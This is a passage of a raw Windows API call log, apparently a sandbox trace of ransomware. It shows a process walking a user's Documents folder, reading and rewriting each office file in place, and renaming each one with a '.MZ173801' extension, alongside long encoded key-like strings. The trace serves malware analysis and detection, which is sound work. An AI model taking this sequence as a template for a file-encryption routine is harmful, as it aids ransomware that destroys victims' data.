5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", lpUsedDefaultChar=0x0) returned 814 [0121.168] GetCurrentThreadId () returned 0x1358 [0121.168] GetCurrentThreadId () returned 0x1358 [0121.168] GetCurrentThreadId () returned 0x1358 [0121.169] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0121.169] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x242799c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", lpUsedDefaultChar=0x0) returned 814 [0121.169] GetCurrentThreadId () returned 0x1358 [0121.169] GetCurrentThreadId () returned 0x1358 [0121.169] GetCurrentThreadId () returned 0x1358 [0121.169] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\28RvPNiENM.xlsx" (normalized: "c:\\users\\fd1hvy\\documents\\28rvpnienm.xlsx"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3fc [0121.169] SetFilePointer (in: hFile=0x3fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f9a4*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f9a4*=0) returned 0x0 [0121.169] SetFilePointer (in: hFile=0x3fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x0 [0121.169] SetFilePointer (in: hFile=0x3fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0xa228 [0121.170] SetFilePointer (in: hFile=0x3fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x0 [0121.170] ReadFile (in: hFile=0x3fc, lpBuffer=0x2431b30, nNumberOfBytesToRead=0xa228, lpNumberOfBytesRead=0x19f9b0, lpOverlapped=0x0 | out: lpBuffer=0x2431b30*, lpNumberOfBytesRead=0x19f9b0*=0xa228, lpOverlapped=0x0) returned 1 [0121.171] CloseHandle (hObject=0x3fc) returned 1 [0121.171] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\28RvPNiENM.xlsx" (normalized: "c:\\users\\fd1hvy\\documents\\28rvpnienm.xlsx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3fc [0121.172] WriteFile (in: hFile=0x3fc, lpBuffer=0x243db60*, nNumberOfBytesToWrite=0xa228, lpNumberOfBytesWritten=0x19f9bc, lpOverlapped=0x0 | out: lpBuffer=0x243db60*, lpNumberOfBytesWritten=0x19f9bc*=0xa228, lpOverlapped=0x0) returned 1 [0121.174] CloseHandle (hObject=0x3fc) returned 1 [0121.176] MoveFileW (lpExistingFileName="C:\\Users\\FD1HVy\\Documents\\28RvPNiENM.xlsx" (normalized: "c:\\users\\fd1hvy\\documents\\28rvpnienm.xlsx"), lpNewFileName="C:\\Users\\FD1HVy\\Documents\\28RvPNiENM.xlsx.MZ173801" (normalized: "c:\\users\\fd1hvy\\documents\\28rvpnienm.xlsx.mz173801")) returned 1 [0121.176] GetCurrentThreadId () returned 0x1358 [0121.176] GetCurrentThreadId () returned 0x1358 [0121.176] GetCurrentThreadId () returned 0x1358 [0121.177] GetCurrentThreadId () returned 0x1358 [0121.177] GetCurrentThreadId () returned 0x1358 [0121.177] GetCurrentThreadId () returned 0x1358 [0121.177] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdf347120, ftCreationTime.dwHighDateTime=0x1d57815, ftLastAccessTime.dwLowDateTime=0x2f896430, ftLastAccessTime.dwHighDateTime=0x1d59870, ftLastWriteTime.dwLowDateTime=0x2f896430, ftLastWriteTime.dwHighDateTime=0x1d59870, nFileSizeHigh=0x0, nFileSizeLow=0xbc06, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName="4DBo0atmEpeC-LN5J.pptx", cAlternateFileName="4DBO0A~1.PPT")) returned 1 [0121.177] FileTimeToLocalFileTime (in: lpFileTime=0x19fafc, lpLocalFileTime=0x19fa5c | out: lpLocalFileTime=0x19fa5c) returned 1 [0121.177] FileTimeToDosDateTime (in: lpFileTime=0x19fa5c, lpFatDate=0x19faca, lpFatTime=0x19fac8 | out: lpFatDate=0x19faca, lpFatTime=0x19fac8) returned 1 [0121.177] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\4DBo0atmEpeC-LN5J.pptx" (normalized: "c:\\users\\fd1hvy\\documents\\4dbo0atmepec-ln5j.pptx"), fInfoLevelId=0x0, lpFileInformation=0x19f9f0 | out: lpFileInformation=0x19f9f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdf347120, ftCreationTime.dwHighDateTime=0x1d57815, ftLastAccessTime.dwLowDateTime=0x2f896430, ftLastAccessTime.dwHighDateTime=0x1d59870, ftLastWriteTime.dwLowDateTime=0x2f896430, ftLastWriteTime.dwHighDateTime=0x1d59870, nFileSizeHigh=0x0, nFileSizeLow=0xbc06)) returned 1 [0121.177] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0121.177] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x242762c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", lpUsedDefaultChar=0x0) returned 814 [0121.178] GetCurrentThreadId () returned 0x1358 [0121.178] GetCurrentThreadId () returned 0x1358 [0121.178] GetCurrentThreadId () returned 0x1358 [0121.178] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0121.178] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x242799c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", lpUsedDefaultChar=0x0) returned 814 [0121.179] GetCurrentThreadId () returned 0x1358 [0121.179] GetCurrentThreadId () returned 0x1358 [0121.179] GetCurrentThreadId () returned 0x1358 [0121.179] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\4DBo0atmEpeC-LN5J.pptx" (normalized: "c:\\users\\fd1hvy\\documents\\4dbo0atmepec-ln5j.pptx"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3fc [0121.179] SetFilePointer (in: hFile=0x3fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f9a4*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f9a4*=0) returned 0x0 [0121.179] SetFilePointer (in: hFile=0x3fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x0 [0121.179] SetFilePointer (in: hFile=0x3fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0xbc06 [0121.179] SetFilePointer (in: hFile=0x3fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x0 [0121.179] ReadFile (in: hFile=0x3fc, lpBuffer=0x2431b30, nNumberOfBytesToRead=0xbc06, lpNumberOfBytesRead=0x19f9b0, lpOverlapped=0x0 | out: lpBuffer=0x2431b30*, lpNumberOfBytesRead=0x19f9b0*=0xbc06, lpOverlapped=0x0) returned 1 [0121.180] CloseHandle (hObject=0x3fc) returned 1 [0121.181] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\4DBo0atmEpeC-LN5J.pptx" (normalized: "c:\\users\\fd1hvy\\documents\\4dbo0atmepec-ln5j.pptx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3fc [0121.183] WriteFile (in: hFile=0x3fc, lpBuffer=0x243db60*, nNumberOfBytesToWrite=0xbc06, lpNumberOfBytesWritten=0x19f9bc, lpOverlapped=0x0 | out: lpBuffer=0x243db60*, lpNumberOfBytesWritten=0x19f9bc*=0xbc06, lpOverlapped=0x0) returned 1 [0121.184] CloseHandle (hObject=0x3fc) returned 1 [0121.234] MoveFileW (lpExistingFileName="C:\\Users\\FD1HVy\\Documents\\4DBo0atmEpeC-LN5J.pptx" (normalized: "c:\\users\\fd1hvy\\documents\\4dbo0atmepec-ln5j.pptx"), lpNewFileName="C:\\Users\\FD1HVy\\Documents\\4DBo0atmEpeC-LN5J.pptx.MZ173801" (normalized: "c:\\users\\fd1hvy\\documents\\4dbo0atmepec-ln5j.pptx.mz173801")) returned 1 [0121.250] GetCurrentThreadId () returned 0x1358 [0121.250] GetCurrentThreadId () returned 0x1358 [0121.250] GetCurrentThreadId () returned 0x1358 [0121.250] GetCurrentThreadId () returned 0x1358 [0121.250] GetCurrentThreadId () returned 0x1358 [0121.250] GetCurrentThreadId () returned 0x1358 [0121.250] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x618d36c0, ftCreationTime.dwHighDateTime=0x1d5e9b3, ftLastAccessTime.dwLowDateTime=0x7d24e070, ftLastAccessTime.dwHighDateTime=0x1d5e618, ftLastWriteTime.dwLowDateTime=0x7d24e070, ftLastWriteTime.dwHighDateTime=0x1d5e618, nFileSizeHigh=0x0, nFileSizeLow=0x9515, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName="a TQSWLwdnXwLBG6xlM.pps", cAlternateFileName="ATQSWL~1.PPS")) returned 1 [0121.250] FileTimeToLocalFileTime (in: lpFileTime=0x19fafc, lpLocalFileTime=0x19fa5c | out: lpLocalFileTime=0x19fa5c) returned 1 [0121.250] FileTimeToDosDateTime (in: lpFileTime=0x19fa5c, lpFatDate=0x19faca, lpFatTime=0x19fac8 | out: lpFatDate=0x19faca, lpFatTime=0x19fac8) returned 1 [0121.250] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\a TQSWLwdnXwLBG6xlM.pps" (normalized: "c:\\users\\fd1hvy\\documents\\a tqswlwdnxwlbg6xlm.pps"), fInfoLevelId=0x0, lpFileInformation=0x19f9f0 | out: lpFileInformation=0x19f9f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x618d36c0, ftCreationTime.dwHighDateTime=0x1d5e9b3, ftLastAccessTime.dwLowDateTime=0x7d24e070, ftLastAccessTime.dwHighDateTime=0x1d5e618, ftLastWriteTime.dwLowDateTime=0x7d24e070, ftLastWriteTime.dwHighDateTime=0x1d5e618, nFileSizeHigh=0x0, nFileSizeLow=0x9515)) returned 1 [0121.253] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0121.253] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ